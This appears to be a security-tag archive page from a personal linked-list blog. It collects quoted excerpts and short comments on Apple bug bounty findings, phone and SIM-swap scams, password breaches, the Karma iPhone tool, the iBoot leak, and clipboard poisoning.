Between the period of July 6th to October 6th myself, Brett Buerhaus, Ben Sadeghipour, Samuel Erb, and Tanner Barnes worked together and hacked on the Apple bug bounty program.
There were a total of 55 vulnerabilities discovered with 11 critical severity, 29 high severity, 13 medium severity, and 2 low severity reports. These severities were assessed by us for summarization purposes and are dependent on a mix of CVSS and our understanding of the business related impact.
As of October 6th, 2020, the vast majority of these findings have been fixed and credited. They were typically remediated within 1-2 business days (with some being fixed in as little as 4-6 hours).
I was genuinely surprised Apple reacted so fast. The whole thing is well worth a read.
Rob Griffiths, on Robservatory:
Yesterday, instead of having a productive afternoon at home, I had the privilege of sitting at the bank for a couple of hours, resolving a problem completely of my own doing: I fell for a phone scammer. My wife and I had to close our accounts—which were in excess of 25 years old—and set up new ones. I then spent hours updating our various bill paying services, Quicken account access, etc.
Do yourself a favor, and don’t be me. I never thought I’d be “that guy” either, as I keep current on scams, look for signs of fishiness on phone calls, etc. Still, they got me, and it was painful—not necessarily in terms of financial loss (we’re out $500 for maybe 60 to 90 days while they investigate), but in terms of time: Time to fix what I did, and even more time spent beating myself up over my stupidity.
I have a strict rule — I do not give out any personal data or passwords to anyone, especially over the phone, even if I know it’s the bank calling me. I will either ask to call them back, to make sure I’m dialling the correct number, or I’ll go down to their branch personally.
Luckily Rob should pull through this one fine — he’s out some $500, which he’ll probably get back. It could have been much worse.
Google’s post, issued six months after iOS patches were released, creates the false impression of “mass exploitation” to “monitor the private activities of entire populations in real time,” stoking fear among all iPhone users that their devices had been compromised. This was never the case.
Second, all evidence indicates that these website attacks were only operational for a brief period, roughly two months, not “two years” as Google implies. We fixed the vulnerabilities in question in February — working extremely quickly to resolve the issue just 10 days after we learned about it. When Google approached us, we were already in the process of fixing the exploited bugs.
We now have two sides to the story. Where does the truth lie?
Matthew Miller, on ZDNet:
First they hijacked my T-Mobile service, then they stole my Google and Twitter accounts and charged my bank with a $25,000 Bitcoin purchase. I’m stuck in my own personal Black Mirror episode. Why will no one help me?
I use a password manager but I made it a point many years ago to keep some passwords only in my head. My banking login information included.
Regarding the part about Google and Twitter — it’s 2019 and getting help from those companies, in critical situations, is basically impossible. Baffling.
I lost north of $100,000 last Wednesday. It evaporated over a 24-hour time span in a “SIM port attack” that drained my Coinbase account. It has been four days since the incident and I’m gutted. I have zero appetite; my sleep is restless; I am awash in feelings of anxiety, remorse, and embarrassment.
This was the single most expensive lesson of my life and I want to share my experience + lessons learned with as many people as possible. My goal is to increase awareness about these types of attacks and to motivate you to increase the security of your online identity.
I try to take all my security very seriously, but since “I know what I’m doing”, I do like to cut corners a bit. Not as much as Sean though. His piece has motivated me to review my whole setup.
Just two weeks after admitting it stored hundreds of millions of its users’ own passwords insecurely, Facebook is demanding some users fork over the password for their outside email account as the price of admission to the social network.
Facebook users are being interrupted by an interstitial demanding they provide the password for the email account they gave to Facebook when signing up. “To continue using Facebook, you’ll need to confirm your email,” the message demands. “Since you signed up with [email address], you can do that automatically …”
A form below the message asked for the users’ “email password.”
“That’s beyond sketchy,” security consultant Jake Williams told the Daily Beast. “They should not be taking your password or handling your password in the background. If that’s what’s required to sign up with Facebook, you’re better off not being on Facebook.”
The people running Facebook need to be criminally charged for all the wrong that they’ve done and continue to do.
And please just go and delete your Facebook account.
Thomas Brewster, writing for Forbes:
[…] German 18-year-old Linus Henze has uncovered a vulnerability affecting the latest Apple macOS that leaves stored passwords open to malicious apps. That could include logins for your bank website, Amazon, Netflix, Slack and many more apps. And even though this is a Mac-only bug, if you’re using the iCloud keychain, passwords synced across iPhones and Macs may also be in danger.
To make matters worse, it’s likely that no fix is in the works. Henze isn’t disclosing his findings to Apple, telling Forbes the lack of payment for such research was behind his decision to keep the hack’s details secret from the Cupertino giant.
This is bad and while I understand why he doesn’t want to disclose it to Apple, all MacOS users are susceptible to a security breach.
Andy Greenberg, reporting for Wired:
When hackers breached companies like Dropbox and LinkedIn in recent years—stealing 71 and 117 million passwords, respectively—they at least had the decency to exploit those stolen credentials in secret, or sell them for thousands of dollars on the dark web. Now, it seems, someone has cobbled together those breached databases and many more into a gargantuan, unprecedented collection of 2.2 _billion_ unique usernames and associated passwords, and is freely distributing them on hacker forums and torrents, throwing out the private data of a significant fraction of humanity like last year’s phone book.
You can (allegedly) safely check which of your accounts have been breached on Have I Been Pwned. Oh and if you aren’t yet doing so, I strongly recommend using a password manager, such as 1Password.
Joel Schectman, for Reuters:
The ex-Raven operatives described Karma as a tool that could remotely grant access to iPhones simply by uploading phone numbers or email accounts into an automated targeting system. The tool has limits — it doesn’t work on Android devices and doesn’t intercept phone calls. But it was unusually potent because, unlike many exploits, Karma did not require a target to click on a link sent to an iPhone, they said.
In 2016 and 2017, Karma was used to obtain photos, emails, text messages and location information from targets’ iPhones. The technique also helped the hackers harvest saved passwords, which could be used for other intrusions.
It isn’t clear whether the Karma hack remains in use. The former operatives said that by the end of 2017, security updates to Apple Inc’s iPhone software had made Karma far less effective.
How many tools are currently out in the world, whose existence we are completely oblivious to?
Brendan Koerner, for Wired:
Pokora had long been aware that his misdeeds had angered some powerful interests, and not just within the gaming industry; in the course of seeking out all things Xbox, he and his associates had wormed into American military networks too. But in those early hours after his arrest, Pokora had no clue just how much legal wrath he’d brought upon his head: For eight months he’d been under sealed indictment for conspiring to steal as much as $1 billion worth of intellectual property, and federal prosecutors were intent on making him the first foreign hacker to be convicted for the theft of American trade secrets. Several of his friends and colleagues would end up being pulled into the vortex of trouble he’d helped create; one would become an informant, one would become a fugitive, and one would end up dead.
It’s amazing how fast someone’s judgement can become skewed the wrong way.
From their FAQ:
On March 25, 2018, we became aware that during February of this year an unauthorized party acquired data associated with MyFitnessPal user accounts […]
The affected information included usernames, email addresses, and hashed passwords – the majority with the hashing function called bcrypt used to secure passwords.
The affected data did not include government-issued identifiers (such as Social Security numbers and driver’s license numbers) because we don’t collect that information from users. Payment card data was not affected because it is collected and processed separately.
I still have an account over there which I don’t use. Time to get rid of it.
Lorenzo Franceschi-Bicchierai, writing for Motherboard:
Someone just posted what experts say is the source code for a core component of the iPhone’s operating system on GitHub, which could pave the way for hackers and security researchers to find vulnerabilities in iOS and make iPhone jailbreaks easier to achieve.
The GitHub code is labeled “iBoot,” which is the part of iOS that is responsible for ensuring a trusted boot of the operating system. In other words, it’s the program that loads iOS, the very first process that runs when you turn on your iPhone. It loads and verifies the kernel is properly signed by Apple and then executes it—it’s like the iPhone’s BIOS.
The code says it’s for iOS 9, an older version of the operating system, but portions of it are likely to still be used in iOS 11.
Apple has already filed a copyright takedown request with GitHub, which resulted in the code being removed, but that won’t help much — the code is out in the wild.
This is the tale of a macOS-only vulnerability in IOHIDFamily that yields kernel r/w and can be exploited by any unprivileged user.
Physical access not required. Apple is supposedly aware of it.
Apple pushed a security update for the huge High Sierra vulnerability yesterday, introducing a bug while they were at it. You should install the update as soon as possible and then do this, if File Sharing isn’t working:
Open the Terminal app, which is in the Utilities folder of your Applications folder.
sudo /usr/libexec/configureLocalKDC and press Return.
- Enter your administrator password and press Return.
- Quit the Terminal app.
John Gruber summarized the problem, which seems to have been around for a few months now:
So the exploit was floating around, under the radar, for weeks at least, but it seems as though no widespread harm came of it.
Personally, I’d call this much too optimistic — people could have been hacked without them even realizing it.
Graham Cluley drew my attention the other day to an issue that has apparently been known to some for years, but was new to me: clipboard poisoning, an issue where a website can replace what you think is on your clipboard with something else (…)
It turns out that there’s a possibility that this could lead to remote code execution. In other words, it could lead to someone else’s malicious code being run on your computer without your knowledge!
Once malicious code has been run on your computer, that code can download and install other processes, and in no time, your Mac has been pwned.
The key to this issue lies with any code that the user might copy from a website, then copy somewhere else in such a way that it is automatically executed. It turns out that this is possible with shell scripts pasted into the Terminal.
As an example, consider the following command, which is commonly cited as a way to make your Mac show hidden files:
defaults write com.apple.finder AppleShowAllFiles TRUE; killall Finder
Read his full post for tips how to keep yourself safe.
Anti-virus provider MacKeeper is known for pushing the message Apple Mac owners need protection. It needed some extra protection of its own today, after a white hat hacker discovered a database containing 13 million customer records was accessible by just visiting a selection of IP addresses, no username or password required.
Do not install this crap. Ever. And delete it if already installed. It does not help in any meaningful way, and is harmful in many others.
I created my first linked list blog a few years back — it was in Polish and I ran it for a bit over seven years. I launched Infinite Diaries since, but I never got to answer one question which people have been asking me for years: How do I hack WordPress to create a ‘Linked List Blog’?
Continue reading →